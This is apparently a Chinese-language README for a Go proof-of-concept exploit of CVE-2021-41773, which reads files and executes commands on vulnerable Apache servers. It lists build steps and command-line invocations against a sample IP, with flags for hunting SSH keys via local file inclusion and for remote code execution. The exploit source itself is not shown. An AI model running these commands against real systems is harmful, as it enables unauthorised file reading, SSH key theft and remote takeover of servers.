此仓库包含针对 CVE-2021-41773 的概念验证(PoC)。该 CVE 暴露了本地文件包含(LFI)与远程代码执行(RCE)漏洞。
确保你已安装 Go 版本 1.23.0。
使用以下命令构建漏洞利用二进制文件:
go build -o exploit
指定目标 IP:使用 -i 参数指定目标 IP 地址(包含端口)。此为必需项。
./exploit -i 10.0.0.1:8080
指定 SSH 字典大小:使用 -l 参数选择 SSH 字典的大小。
选项:
0:小(默认)1:中2:大./exploit -i 10.0.0.1:8080 -l 1
启用 HTTPS:使用 -ssl 参数启用 HTTPS(默认为 HTTP)。此参数为可选项。
./exploit -i 10.0.0.1:8080 -ssl
指定自定义 SSH 密钥字典:使用 -k 参数提供自定义的 SSH 密钥字典。此参数为可选项。
./exploit -i 10.0.0.1:8080 -k /usr/share/wordlist/SecLists/Discovery/Web-Content/quickhits.txt
启用远程代码执行(RCE):使用 -rce 参数远程执行命令。此参数为可选项。
./exploit -i 10.0.0.1:8080 -rce
我想用 Golang 写点东西并学习这门语言。
这是我用 Golang 编写的第一个完整程序。